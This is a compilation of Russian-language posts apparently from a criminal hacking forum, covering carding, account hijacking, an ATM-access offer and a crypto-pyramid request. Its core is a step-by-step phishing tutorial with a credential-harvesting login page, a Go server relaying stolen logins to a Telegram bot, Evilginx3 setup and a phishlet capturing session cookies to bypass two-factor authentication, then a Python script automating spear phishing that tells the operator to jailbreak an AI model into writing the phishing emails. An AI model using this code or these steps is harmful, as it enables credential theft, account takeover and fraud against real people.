Многие знаю,да и сам так делал когда вбивал в детстве,менял две или три последние цифры кардхолдера или вообще вбивали вечно занятые номера тут есть Free Phone Number [phone-validator](https://www.textmagic.com/free- tools/phone-validator) думаю объяснять не надо... кли- кай.Решил там зарегаться понравился сервис,уберу в закладки и буду пользоваться в тихаря вбил три почты все вроде как корпы везде проходили тут нет... кли- кай.Думал криворукий стал и руки от водки трясутся но нет ответ нашел быстро и там же по ссылки [email-validation](https://www.textmagic.com/free-tools/email-validation- tool).
Многие регают почты от болды хотя им сто раз сказано регайте на кардхолдера все максимально ответ тут же [billing-address](https://www.textmagic.com/free- tools/billing-address-validation) кли- кай.Обязательно прочитайте FAQ каждому сервису много интересного,итог не х.. лазить по ночам,угон не прошел у меня как вы поняли но не отчаиваюсь и Вам не советую зато теперь есть не плохой чекер :hi:
Обсуждение видеоhttp://xss.is/?act=video#video232[
Автор: неизвестен
Дата добавления: 11.11.2006 02:00
Видео по кардингу порнухи.
[url=http://xss.is/video/]Скриншот](http://xss.is/?act=video#video232)
[a style='color:#309030 !important' href='http://dllfiles.org/video/porn_card.rar' target='_blank']Скачать | Download[/url] (1.32 Mb)
Цитата:
Восстановление пароля для входа в систему ""
Уважаемый пользователь системы «»!
Это сообщение отправлено Вам, потому что Вы воспользовались возможностью
восстановить пароль для входа в систему «» при помощи электронного адреса,
который указан в Вашем профиле.
SMS с логином и паролем для входа в систему «» будет отправлено на Ваш
абонентский номер после того, как Вы перейдете по данной ссылке:
https://****/tbmb/forgot/generatePwd...6YmKAxO3ic1YKa
Проигнорируйте это сообщение, если оно было отправлено Вам ошибочно или же Вы хотите и в дальнейшем пользоваться Вашим действующим паролем для доступа к системе «****».
С уважением, Центр обслуживания абонентов «****»
Обратите, пожалуйста, внимание: ответы на это сообщение не обрабатываются.
Прошу помощи!
Если перейти по данной ссыле- уходит СМС на мобилу!
Логин знаю,как узнать пароль или перенаправить СМС на МОЙ номер???
Как мне действовать?
As a beginner, how can I start gift card carding? I know it is noob stuff but kindly help
Есть связь на 1000+- АТМ удалённо .
Идей и оплата по договорённости.
_Автор:miserylord
Эксклюзивно для форума:
_xss.is
Приветствую, любители цифровых приключений!
Статья посвящена созданию современных фишинговых сайтов с помощью инструмента
Evilgnix: особенности атаки, развертывание и использование тулзы, написание
собственных шаблонов для целевых сайтов (т.н. фишлеты).
Чем больше сила, тем больше и ответственность, как сказано в Библии. Другими
словами, материал публикуется исключительно в ознакомительных целях!
Разделы
Spoiler: Фишинговая атака
Фишинг — это вид атаки, в котором нападающий использует средства социальной инженерии для кражи данных цели. Он включает использование поддельных сайтов, писем и ресурсов, которые на первый взгляд выглядят как оригинальные.
Представьте, что есть сайт музыкального стриминга, и вместо того чтобы оплачивать подписку, вы создаете поддельный сайт-копию, отправляете ссылку своему другу, он заходит в аккаунт, а вы получаете его данные. У вас больше нет друга, у вас есть аккаунт на музыкальном сервисе. Это пример фишинговой атаки в действии.
Представьте, что у вас нет денег, и вы создаете копию банковского сайта. Вы остались одни и не можете больше писать никому, в таком случае вы принимаете решение просто отправлять электронные письма с ссылкой на поддельный банк всем подряд. Это называется рассылка фишинговых писем. Письма похожи на рыболовные удочки. В самом деле, термин «фишинг» происходит от английского слова «fishing» (рыбалка).
Я не раз слышал фразу: «человек — самое слабое звено в любой системе кибербезопасности». Читая разборы крупных атак на корпоративные инфраструктуры, можно заметить, что они часто начинаются с фишинга. Письмо отправляется «секретарше», и атака развивается дальше. Но все начинается с этого момента. В конце концов, мы действительно дети тех, кто убегал от всего, что похоже на тигра, а не тех, кто тратил время на детальный анализ зверя.
Классический фишинг
Классический фишинг сайта — это по сути просто копия с отправкой нужных данных
в нужное место. Для создания копий сайта можно воспользоваться различными
инструментами, например командой wget или программой HTTrack — они скачают
зеркальную копию всего сайта или нужных страниц на компьютер.
После этого необходимо перехватить данные. Представим, что фишинг — это просто
HTML-страница с формой для входа, где вводятся логин и пароль. Необходимо
добавить JavaScript-код для отправки данных на сервер; код будет выглядеть
примерно так:
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Форма ввода</title>
</head>
<body>
<h1>Форма ввода данных</h1>
<form id="dataForm">
<label for="name">Логин:</label>
<input type="text" id="name" name="name" required><br><br>
<label for="password">Пароль:</label>
<textarea id="password" name="password" required></textarea><br><br>
// 1
<button type="button" onclick="submitData()">Войти</button>
</form>
<script>
async function submitData() {
// 2
const name = document.getElementById('name').value;
const password = document.getElementById('password').value;
// 3
const payload = {
name: name,
password: password
};
// 4
try {
const response = await fetch('http://localhost:8080/send', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
});
if (response.ok) {
alert('Данные успешно отправлены!');
} else {
alert('Ошибка при отправке данных.');
}
} catch (error) {
console.error('Ошибка:', error);
alert('Ошибка при отправке данных.');
}
}
</script>
</body>
</html>
Сервер будет принимать сообщения и отправлять их в диалог в Telegram через бота. Я буду использовать язык Golang. Бот будет работать без сторонних библиотек, используя Telegram API:
C-like:Copy to clipboard
package main
import (
"encoding/json"
"fmt"
"log"
"net/http"
"net/url"
)
const (
telegramAPIURL = "https://api.telegram.org/botTOKEN/sendMessage" // 1
chatID = "1234567890" // 2
)
// 3
type FormData struct {
Name string `json:"name"`
Password string `json:"password"`
}
// 4
func sendMessageToTelegram(message string) error {
msg := url.QueryEscape(message)
fullURL := fmt.Sprintf("%s?chat_id=%s&text=%s", telegramAPIURL, chatID, msg)
resp, err := http.Get(fullURL)
if err != nil {
return err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return fmt.Errorf("failed to send message, status code: %d", resp.StatusCode)
}
return nil
}
// 5
func handler(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Access-Control-Allow-Origin", "*")
w.Header().Set("Access-Control-Allow-Methods", "POST")
w.Header().Set("Access-Control-Allow-Headers", "Content-Type")
if r.Method != http.MethodPost {
http.Error(w, "Invalid request method", http.StatusMethodNotAllowed)
return
}
var data FormData
err := json.NewDecoder(r.Body).Decode(&data)
if err != nil {
http.Error(w, "Invalid request payload", http.StatusBadRequest)
return
}
message := fmt.Sprintf("Логин: %s\nПароль: %s", data.Name, data.Password)
err = sendMessageToTelegram(message)
if err != nil {
http.Error(w, "Failed to send message", http.StatusInternalServerError)
return
}
w.WriteHeader(http.StatusOK)
fmt.Fprintln(w, "Data successfully sent!")
}
// 6
func main() {
http.HandleFunc("/send", handler)
log.Fatal(http.ListenAndServe(":8080", nil))
}
Запускаем бота, вводим данные в форму и видим сообщение с логином и паролем.
На самом деле для кражи аккаунта эффективнее использовать куки-файлы вместо (или вместе) с данными для авторизации. Предоставив чужие куки-файлы, вы сможете увидеть страницу так, как ее видит владелец, без необходимости ввода данных.
Главный минус такого фишинга заключается в том, что очень сложно организовать перехват второго фактора. Мы можем получить логин и пароль, отобразить страницу с СМС после входа, но чтобы попасть в аккаунт, нужно будет в реальном времени мониторить активность пользователя. К тому же, сайты могут изменить свой внешний вид, и чтобы не вызвать подозрений, придется переделывать копию заново.
Решение этих проблем — Evilgnix.
Spoiler: Evilgnix
Что это такое?
Evilginx — это мощный инструмент для создания фишинговых сайтов, которые имитируют настоящие веб-ресурсы в реальном времени. Его основная особенность заключается в том, что он использует метод MiTM (Man-in-the-Middle) атаки, чтобы перехватывать и, при необходимости, изменять коммуникацию между двумя сторонами, не подозревающими о его присутствии.
Evilginx функционирует как реверс-прокси-сервер. Когда пользователь пытается войти на фишинговый сайт, Evilginx перенаправляет его запросы на настоящий целевой веб-сайт. В результате пользователь взаимодействует непосредственно с реальным сайтом, но все запросы и ответы проходят через Evilginx. В процессе этого Evilginx перехватывает и сохраняет учетные данные пользователя, а также любые токены двухфакторной аутентификации, которые вводятся на фишинг странице. Эти данные затем передаются на настоящий сервер, а Evilginx захватывает ответ от целевого сайта.
Такой механизм работы делает обнаружение атаки значительно сложнее, поскольку внешне взаимодействие происходит напрямую с настоящим сайтом.
На момент написания этой статьи актуальной версией является Evilginx3. Репозиторий с инструментом доступен на GitHub: Evilginx3.
Evilginx3: Настройка и Практическое Использование
Для начала работы с Evilginx3 вам потребуется VPS (виртуальный частный сервер). Большинство крупных провайдеров предлагают кредиты на сумму нескольких сотен долларов для тестирования проектов на своих мощностях, обычно на срок до одного месяца (например, DigitalOcean, Microsoft Azure, Google и другие). Обратите внимание, что VPS может называться по-разному: на DigitalOcean — Droplet, на Azure — Virtual Machines. Для начального этапа подойдут любые характеристики, однако для практического использования можно увеличить ресурсы, если это необходимо. В целом, Evilginx3 не требует значительных ресурсов, особенно если вы работаете с одним таргетом. Установите на VPS образ Ubuntu Server LTS последней версии (на момент написания статьи — 24). VPS будет выступать в роли C2 сервера (команда и контроль).
Кроме VPS вам понадобится доменное имя. Выбирайте домен, максимально похожий на оригинальный сайт. Домен для фишингового сайта можно приобрести за $2-10 в год (если это не самый популярный ресурс). Домен можно купить, например, на NameCheap, GoDaddy или любом другом сервисе. Существуют также сайты, предлагающие бесплатные домены, такие как Freenom. Будьте внимательны к настройкам whois: некоторые сервисы предлагают скрыть эти данные, другие нет. С помощью whois могут быть раскрыты ваше имя и номер телефона, указанные при регистрации.
Для доступа к VPS используйте SSH. В зависимости от сервиса, вам предложат открыть доступ еще на этапе создания. Вы можете подключиться к SSH как с помощью логина и пароля, так и с помощью ключей. Второй вариант предпочтителен, но если вы не знакомы с ним, используйте первый.
После подключения к VPS с помощью SSH, выполните команду sudo apt update && sudo apt upgrade, чтобы обновить список доступных пакетов и установить их обновления.
Затем установите необходимые пакеты: golang, так как программы написаны на нем, а также git, make и gcc, командой sudo apt install golang git make gcc.
Клонируйте официальный репозиторий с программой командой git clonehttps://github.com/kgretzky/evilginx2, перейдите в папку с проектом командой cd evilginx2/ и выполните команду make , чтобы собрать проект.
Важно : Для работы программы необходимо открыть порты 443 (TCP) и 53 (UDP) в фаерволе. Сделайте это через панель администратора VPS-сервиса. На Azure это вкладка Network settings, где нужно добавить Inbound port rules. Если возникают проблемы с фаерволом, откройте порты через терминал командой sudo ufw allow [portNumber] [udp or tcp]. По умолчанию фаервол закроет все порты, кроме 22 (SSH).
Для запуска используйте команду sudo ./build/evilginx -p phishlets/ (запускаем билд версию и указываем аргумент -p, который указывает на папку с фишлетами).
Фишлеты в контексте Evilginx — это конфигурационные файлы, определяющие внешний вид фишинговой страницы, данные, которые нужно собирать, и взаимодействие с таргетом. Фишлеты написаны в формате YAML, который схож (выступает суперсетом) с JSON (будьте внимательны, YAML — регистрозависимый формат!). Примеры фишлетов можно найти на GitHub, например, в этом репозитории: GitHub - An0nUD4Y/Evilginx2-Phishlets: Evilginx3 Phishlets version Only For Testing/Learning Purposes (там также есть админ панель для проекта). Мы будем использовать фишлет, предоставленный разработчиками проекта, который находится в каталоге phishlets под названием example.yaml.
Возвращаемся к домену. Чтобы продолжить, зайдите на сайт регистратора и
добавьте A-записи (Address Records). Эти записи связывают доменное имя с IP-
адресом. IP-адрес можно найти в панели администратора VPS, он будет называться
Public IP address. Пропишите A-записи, заменяя существующие на IP-адрес VPS, и
добавьте поддомены (название A-записи — это поддомен, IP тот же). Поддомены
берутся из фишлета (все phish_sub из proxy_hosts, если их 10, добавьте 10).
Сохраните изменения и дождитесь их применения (до 72 часов, но часто все
готово в течение часа). Для проверки A-записей используйте команду dig
Awww.domenName.com.
Также для корректной работы необходимо добавить домен в Turnstile Site Cloudflare. В папке redirectors найдите файл index.html, где указана инструкция по добавлению домена в Turnstile. Добавьте домен на сайте https://www.cloudflare.com/products/turnstile/ и получите API ключ sitekey. Этот шаг никогда не был упомянут в инструкциях, но он помог мне исправить ошибку, из-за которой малишис-линки перенаправлялись на видео "Rick Astley - Never Gonna Give You Up". Если после добавления ключа ошибка сохраняется, пересоберите билд версию программы.
Запускаем Evilginx, вводим следующие команды:
Теперь создаем т.н. лурасы (фишинговые страницы). Команда lures create example создаст лурас и вернет ID. Чтобы получить ссылку, используйте lures get-url 0[luras number]. Перейдите по ссылке и вы увидите фишинговую страницу оригинального сайта. Если вы войдете по логину и паролю, в терминале будет видно, что Evilginx перехватывает нужные данные.
Для получения данных используйте команду sessions , добавляя ID после нее. Для подставки куки в браузере используйте расширение типа Cookie-Editor.
Помимо ошибок с Cloudflare, вы можете столкнуться с другими проблемами:
Изучите Issues · kgretzky/evilginx2 · GitHub или создайте новый запрос, возможно, вам помогут (или предложат купить курс за 400 долларов).
Spoiler: Phishlet
Написание фишлета
Для вдохновения вы можете изучить доступные фишлеты на GitHub, хотя многие из них могут не работать. В этом примере я буду использовать собственный сайт. Документацию по созданию фишлетов в нужном формате можно найти на официальном сайте Evilginx.
Страница login.html
HTML:Copy to clipboard
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
<style>
body {
font-family: Arial, sans-serif;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
background-color: #f4f4f4;
}
.login-container {
background-color: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
.login-container h1 {
margin-top: 0;
font-size: 24px;
}
.login-container label {
display: block;
margin-bottom: 8px;
}
.login-container input {
width: 100%;
padding: 8px;
margin-bottom: 12px;
border: 1px solid #ddd;
border-radius: 4px;
}
.login-container button {
width: 100%;
padding: 10px;
background-color: #007bff;
border: none;
border-radius: 4px;
color: white;
font-size: 16px;
cursor: pointer;
}
.login-container button:hover {
background-color: #0056b3;
}
.login-container .error {
color: red;
margin-bottom: 12px;
}
</style>
</head>
<body>
<div class="login-container">
<h1>Login</h1>
<form method="POST" action="/login">
<div class="error">
</div>
<label for="username">Username</label>
<input type="text" id="username" name="username" required>
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
<button type="submit">Login</button>
</form>
</div>
</body>
</html>
Код сервера будет написан на Go с использованием базы данных SQLite и сессиями.
C-like:Copy to clipboard
package main
import (
"database/sql"
"fmt"
"net/http"
"time"
// 1
"github.com/gorilla/sessions"
_ "github.com/mattn/go-sqlite3"
)
// 2
var (
store = sessions.NewCookieStore([]byte("secret-key"))
db *sql.DB
)
// 3
func main() {
var err error
db, err = sql.Open("sqlite3", "database.db")
if err != nil {
panic(err)
}
defer db.Close()
initializeDatabase()
http.HandleFunc("/login", loginHandler)
http.HandleFunc("/dashboard", dashboardHandler)
http.HandleFunc("/logout", logoutHandler)
http.ListenAndServe(":8080", nil)
}
// 4
func initializeDatabase() {
_, err := db.Exec(`
CREATE TABLE IF NOT EXISTS users (
username TEXT PRIMARY KEY,
password TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS sessions (
session_id TEXT PRIMARY KEY,
username TEXT NOT NULL,
session_token TEXT NOT NULL
);
`)
if err != nil {
panic(err)
}
var count int
err = db.QueryRow("SELECT COUNT(*) FROM users WHERE username = 'admin'").Scan(&count)
if err != nil {
panic(err)
}
if count == 0 {
_, err = db.Exec("INSERT INTO users (username, password) VALUES (?, ?)", "admin", "admin")
if err != nil {
panic(err)
}
fmt.Println("Default user 'admin' created")
}
}
// 5
func loginHandler(w http.ResponseWriter, r *http.Request) {
session, _ := store.Get(r, "session")
if session.Values["username"] != nil {
http.Redirect(w, r, "/dashboard", http.StatusSeeOther)
return
}
if r.Method == http.MethodPost {
username := r.FormValue("username")
password := r.FormValue("password")
var dbPassword string
err := db.QueryRow("SELECT password FROM users WHERE username = ?", username).Scan(&dbPassword)
if err != nil || dbPassword != password {
http.Error(w, "Invalid username or password", http.StatusUnauthorized)
return
}
session.Values["username"] = username
session.Save(r, w)
sessionToken := fmt.Sprintf("%d%s", time.Now().Unix(), "cookie")
_, err = db.Exec("INSERT INTO sessions (session_id, username, session_token) VALUES (?, ?, ?)", sessionToken, username, sessionToken)
if err != nil {
http.Error(w, "Database error", http.StatusInternalServerError)
return
}
http.SetCookie(w, &http.Cookie{
Name: "session_token",
Value: sessionToken,
Expires: time.Now().Add(1 * time.Hour),
Path: "/",
})
http.Redirect(w, r, "/dashboard", http.StatusSeeOther)
return
}
http.ServeFile(w, r, "login.html")
}
// 6
func dashboardHandler(w http.ResponseWriter, r *http.Request) {
session, _ := store.Get(r, "session")
if session.Values["username"] == nil {
http.Redirect(w, r, "/login", http.StatusSeeOther)
return
}
cookie, err := r.Cookie("session_token")
if err != nil {
http.Redirect(w, r, "/login", http.StatusSeeOther)
return
}
sessionToken := cookie.Value
var username string
err = db.QueryRow("SELECT username FROM sessions WHERE session_token = ?", sessionToken).Scan(&username)
if err != nil {
http.Redirect(w, r, "/login", http.StatusSeeOther)
return
}
w.Header().Set("Content-Type", "text/html")
fmt.Fprintf(w, "<h2>Welcome %s</h2><br>", username)
fmt.Fprintf(w, "<h3>Token %s</h3><br>", sessionToken)
fmt.Fprintln(w, `<a href="/logout">Logout</a>`)
}
// 7
func logoutHandler(w http.ResponseWriter, r *http.Request) {
session, _ := store.Get(r, "session")
session.Values["username"] = nil
session.Save(r, w)
cookie, err := r.Cookie("session_token")
if err == nil {
sessionToken := cookie.Value
db.Exec("DELETE FROM sessions WHERE session_token = ?", sessionToken)
}
http.SetCookie(w, &http.Cookie{
Name: "session_token",
Value: "",
MaxAge: -1,
Path: "/",
})
http.Redirect(w, r, "/login", http.StatusSeeOther)
}
Для использования режима разработчика добавьте флаг -developer к команде evilginx, установите любой домен и настройте локальный IP-адрес (127.0.0.1).
Не забывайте, что YAML чувствителен к регистру и отступам. Каждый символ и отступ должны быть строго в нужном формате.
Пример фишлета
YAML:Copy to clipboard
# 1
min_ver: '3.0.0'
# 2
proxy_hosts:
- {phish_sub: '', orig_sub: '', domain: 'target.com', session: true, is_landing: true}
# 3
sub_filters:
- {triggers_on: 'target.com', orig_sub: '', domain: 'target.com', search: 'https://{hostname}/login', replace: 'https://{hostname}/login', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# 4
auth_tokens:
- domain: 'target.com'
keys: ['session_token']
# 5
credentials:
username:
key: 'username'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
# 6
auth_urls:
- '/dashboard'
# 7
login:
domain: 'target.com'
path: '/login'
1\. Указываем минимальную версию Evilginx, необходимую для работы с данной
конфигурацией.
2\. Настройка прокси-серверов для перехвата и манипулирования запросами:
* phish_sub: Пустое значение, так как поддоменов нет.
* orig_sub: Пустое значение, так как поддоменов нет.
* domain: Домен целевого сайта.
* is_landing: Установлено в true, так как это страница входа.
* session: true указывает на поддержку сессий.
3\. Фильтры для замены контента:
* triggers_on и domain: Таргет-домен.
* orig_sub: Пустое значение, поскольку поддоменов нет.
* search и replace: URL-шаблоны для поиска и замены (в данном случае они одинаковы, что означает отсутствие изменений в URL).
* mimes: Мим-типы, на которые будут применяться фильтры.
* redirect_only: Указывает, что фильтр применяется только для перенаправлений.
4\. Токены авторизации:
* domain: Домен, на котором будет перехватываться токен.
* keys: Список ключей для перехвата (здесь это 'session_token').
5\. Перехват учетных данных:
* key: Имя поля формы с учетными данными.
* search: Регулярное выражение для захвата значения.
* type: Тип HTTP-запроса (например, 'post', что означает, что данные берутся из POST-запроса).
6\. URL для перенаправления после успешной авторизации.
7\. Конфигурация для страницы входа:
* Домен для страницы входа.
* Путь к странице входа.
В целом, написание фишлетов не представляет особой сложности, хотя в дикой
среде могут возникнуть некоторые трудности. Это, возможно, первая статья из
цикла. Трям! Пока!
I am creating evilginx phishlet but after making one, it doesn't show up in the phishlet folder when i run the evilginx using ./build/evilginx -p phishlets/. i have tested the code using the AI and it is good condition.. it doesn't give error. i added a .log to monitor any reason why it wont show up and there are no errors in the .log file.... i copied the phishlet from a free tutorial. and code is exactly the same. Any suggestion is welcome here
Наблюдаю как многие оффшорные блогеры начали продвигать проект внутри телеги Capybara,
Code:Copy to clipboard
<ссылка удалена модератором>
Проект жёсткий, уверен работает очень хорошо на стрижку денег, при этом все завернуть в легальную оболочку..
Кто -нить встречался, где можно на них полить? Или это жёсткий приват чисто для блогеров?
порекомендуйте возможно у кого то есть готовая крипто пирамида. Платформа с возможностью инвестирования и вывода средств. готовая платформа. нужна под европейскую аудиторию. может быть есть даже готовое мобильное приложение с удобным интерфейсом.
Интро
No system is safe, говорили они. Правда ли это? Скорее да, ведь в любой системе есть как минимум одна уязвимость — человек. Поговорим обо всех типов атак СИ, от самых простых до самых продвинутых. Немножко практики и в целом приятное, легко читаемая статья с реальными примерами из истории.
Эволюция социальной инженерии, формы киберманипуляции, которая использует психологию человека для получения несанкционированного доступа к информации и системам, претерпела значительные изменения с момента своего появления. Изначально характеризовавшаяся базовыми техниками, такими как фишинг, предтекстинг и подставы, социальная инженерия перешла в более сложный арсенал психологических манипуляций. Эти техники развились до таких форм, как целевой фишинг (spear phishing), атаки на "китов" (whaling) и атаки через зараженные сайты (watering hole), используя уязвимости как человека, так и технологий для достижения вредоносных целей.
Социальная инженерия примечательна своей адаптивностью и эффективностью в компрометации как отдельных лиц, так и организаций. Она основывается на эксплуатации доверия, авторитета и когнитивных предубеждений, что делает ее грозной угрозой в ландшафте кибербезопасности. Растущая сложность этих атак наглядно демонстрируется резонансными инцидентами, такими как утечка данных RSA в 2011 году и утечка данных Target в 2013 году, которые подчеркивают значительные финансовые и операционные последствия успешных кампаний социальной инженерии.
В ответ на растущую угрозу социальной инженерии становится необходимым многоуровневая стратегия защиты, сочетающая технологические решения, непрерывное обучение безопасности и бдительный ответ на инциденты. Будущее социальной инженерии, вероятно, будет продолжать развиваться благодаря достижениям в области ИИ, растущему использованию новых технологий и эксплуатации глобальных социально-экономических условий. По мере того как злоумышленники продолжают совершенствовать свои методы, значение надежной защиты и этических соображений в кибербезопасности остается первостепенным.
Легкие Техники
Ранние (легкие) техники социальной инженерии в значительной степени опирались
на фундаментальные психологические манипуляции и простые технические приемы
для обмана целей, чтобы выведать конфиденциальную информацию или заставить их
совершить действия, которые могли бы поставить под угрозу их безопасность.
Предтекстинг
Предтекстинг — ранняя техника социальной инженерии, при которой злоумышленник
создает вымышленный сценарий для получения информации от цели. Во время
предтекстинга злоумышленник часто притворяется человеком, занимающим
авторитетную должность или имеющим законную причину для получения информации.
Эта техника часто используется против компаний, хранящих данные клиентов,
таких как банки, кредитные компании и коммунальные службы.
Приманка
Приманка включает в себя размещение чего-то заманчивого или любопытного перед
жертвой, чтобы привлечь ее в ловушку социальной инженерии. Классический пример
приманки — раздача бесплатных USB-накопителей на конференции. Ничего не
подозревающий пользователь может подумать, что получает бесплатное устройство
для хранения данных, но USB-накопитель может быть загружен удаленным доступом,
который заражает компьютер при подключении.
Фишинг
Фишинг — одна из самых ранних и устойчивых форм социальной инженерии. Она
заключается в том, что злоумышленник маскируется под доверенное лицо, чтобы
обманом заставить пользователя открыть поддельное электронное письмо с
вредоносной ссылкой, вложенным файлом или встроенным кодом. После того как
жертва взаимодействует с письмом, злоумышленник может использовать систему
пользователя для кражи данных, учетных записей или установки вредоносного ПО.
Термин «фишинг», с его причудливым написанием с использованием «ph» вместо
«f», является отсылкой к ранней хакерской культуре, известной как «phreaks»,
которая нацеливалась на телефонные системы. Первое известное упоминание о
фишинге датируется почти 36 годами назад, подчеркивая его долгосрочное
присутствие как значительную угрозу в интернете. Одним из распространенных
примеров фишинга является фишинг по электронной почте, когда отправляют
электронные письма, выдавая себя за других, в надежде извлечь ценную
информацию. Например, киберпреступник может отправить письмо жертве,
притворившись родственником, пытаясь собрать личную информацию, такую как
адрес, день рождения или учетные данные.
Эволюция фишинга
Фишинг значительно эволюционировал с момента своего появления в формате
электронной почты. Современные фишинговые атаки теперь включают различные
векторы, такие как SMS-сообщения (смс-фишинг), QR-коды (квишинг) и обманчивые
URL-адреса (фишинг HTTPS). Компрометация деловой электронной почты (BEC) также
стала значительной угрозой, нацеливаясь на сотрудников, имеющих доступ к
внешним инструментам, таким как электронная почта и социальные сети.
Проход и хвостовой проход
Проход и хвостовой проход — это физические техники социальной инженерии.
Проход включает в себя следование за авторизованным лицом в ограниченную зону
без его ведома, в то время как хвостовой проход требует, чтобы авторизованное
лицо сознательно позволило злоумышленнику получить доступ. Эти техники
используют человеческое поведение и физические уязвимости безопасности для
получения несанкционированного доступа к защищенным местам.
Целевой фишинг
Целевой фишинг — это целенаправленный метод фишинга, который фокусируется на
конкретных лицах или группах в организации. В отличие от общих фишинговых
атак, которые бросают широкую сеть в надежде поймать любую подозрительную
жертву, целевой фишинг включает предварительное исследование и персонализацию.
Злоумышленники собирают подробную информацию о своих целях, чтобы создать
убедительные электронные письма или сообщения, которые кажутся исходящими от
доверенного источника, например, коллеги или начальника. Этот уровень
персонализации значительно увеличивает вероятность того, что цель ответит,
выдав конфиденциальную информацию или совершив действие, которое поставит под
угрозу безопасность.
Пример
Типичным примером целевого фишинга является электронное письмо, которое
кажется исходящим от генерального директора компании, запрашивающее у
сотрудника конфиденциальную финансовую информацию. Письмо может ссылаться на
конкретные детали, известные только генеральному директору и сотруднику, делая
его убедительным. Это создает ощущение срочности и доверия, заставляя
сотрудника действовать без тщательной проверки.
Также представим самый простой, прямолинейный код, который сочетает в себе элементы социального картографирования, анализа поведения и автоматизированного целевого фишинга, используя алгоритмы машинного обучения для повышения эффективности атаки.
Python:Copy to clipboard
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
import networkx as nx
import requests
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class AdvancedSocialEngineeringAttack:
def __init__(self):
self.social_graph = nx.Graph()
self.ml_model = None
self.vectorizer = TfidfVectorizer()
def build_social_graph(self, data):
for connection in data:
self.social_graph.add_edge(connection['source'], connection['target'], weight=connection['interaction_strength'])
def train_ml_model(self, data):
X = self.vectorizer.fit_transform(data['content'])
y = data['is_vulnerable']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
self.ml_model = RandomForestClassifier(n_estimators=100, random_state=42)
self.ml_model.fit(X_train, y_train)
def analyze_target(self, target_id):
target_connections = list(self.social_graph.neighbors(target_id))
target_influence = self.social_graph.degree(target_id, weight='weight')
return target_connections, target_influence
def generate_phishing_content(self, target_id, target_connections, target_influence):
context = f"Target: {target_id}, Connections: {len(target_connections)}, Influence: {target_influence}"
generated_content = self.generate_content_with_gpt(context)
return generated_content
def generate_content_with_gpt(self, context):
api_url = "https://api.openai.com/тут моделька"
headers = {"Authorization": f"Bearer {API_KEY}"}
data = {
"prompt": f"Generate a phishing email based on this context (промпт должен быть и одновренно джейлбрейком, ведь ИИ не напишет по такому промпту письмо): {context}",
"max_tokens": 100
}
response = requests.post(api_url, headers=headers, json=data)
return response.json()['choices'][0]['text']
def assess_vulnerability(self, content):
vectorized_content = self.vectorizer.transform([content])
vulnerability_score = self.ml_model.predict_proba(vectorized_content)[0][1]
return vulnerability_score
def send_phishing_email(self, target_email, subject, content):
sender_email = "example@example.com"
password = "fake_password"
message = MIMEMultipart()
message["From"] = sender_email
message["To"] = target_email
message["Subject"] = subject
message.attach(MIMEText(content, "plain"))
with smtplib.SMTP("smtp.gmail.com", 587) as server:
server.starttls()
server.login(sender_email, password)
server.send_message(message)
def execute_attack(self, target_id, target_email):
target_connections, target_influence = self.analyze_target(target_id)
phishing_content = self.generate_phishing_content(target_id, target_connections, target_influence)
vulnerability_score = self.assess_vulnerability(phishing_content)
if vulnerability_score > 0.7:
subject = "Важное сообщение о безопасности"
self.send_phishing_email(target_email, subject, phishing_content)
print(f"Атака выполнена на {target_id} с вероятностью успеха {vulnerability_score:.2f}")
else:
print(f"Атака на {target_id} отменена. Низкая вероятность успеха: {vulnerability_score:.2f}")
attack = AdvancedSocialEngineeringAttack()
social_data = pd.read_csv("social_connections.csv")
attack.build_social_graph(social_data)
ml_data = pd.read_csv("vulnerability_data.csv")
attack.train_ml_model(ml_data)
attack.execute_attack("employee123", "employee123@company.com")
Атаки на зараженные сайты
Атаки на зараженные сайты включают в себя компрометацию веб-сайта, часто
посещаемого целевой группой людей. Злоумышленник определяет веб-сайт или
ресурс, который часто использует их целевая группа, и заражает его вредоносным
ПО. Когда члены целевой группы посещают зараженный сайт, их устройства
становятся зараженными, предоставляя злоумышленнику доступ к конфиденциальной
информации. Эта техника полагается на доверие пользователей к легитимным веб-
сайтам, делая ее скрытой и эффективной.
Значительный инцидент
Значительным случаем атаки на зараженный сайт произошел в феврале 2021 года,
когда хакеры скомпрометировали систему водоочистительного сооружения во
Флориде. Злоумышленники идентифицировали веб-сайт, который часто использовался
сотрудниками объекта, и внедрили в него вредоносное ПО. Когда сотрудники
посетили сайт, вредоносное ПО позволило злоумышленникам удаленно изменить
настройки водоочистки, опасно увеличив уровень гидроксида натрия в воде. К
счастью, бдительный оператор заметил аномалию и исправил настройки до того,
как был нанесен какой-либо вред.
Атаки на руководителей (whaling)
Атаки на руководителей (whaling) — это продвинутая форма целевого фишинга,
нацеленная на старших руководителей и топ-менеджмент. Цель этих атак —
использовать авторитет и привилегии доступа высокопоставленных лиц в
организации. Злоумышленники создают хорошо оформленные электронные письма,
использующие деловой язык и создающие ощущение срочности, часто запрашивая
действия, такие как переводы средств или раскрытие конфиденциальных данных.
Эти атаки особенно опасны, поскольку цели имеют полномочия принимать
значительные решения, что увеличивает потенциальный ущерб от атаки.
Пример сценария
В одном из заметных случаев злоумышленники выдали себя за финансового
директора компании и отправили поддельное электронное письмо другому
руководителю, инструктируя его инициировать крупный перевод средств на внешний
счет. Письмо было тщательно составлено, чтобы имитировать стиль письма
финансового директора и включало специфическую деловую лексику, делая его
очень убедительным. Руководитель, полагая, что письмо было подлинным, выполнил
запрос, что привело к значительным финансовым потерям для компании.
Дополнительные техники
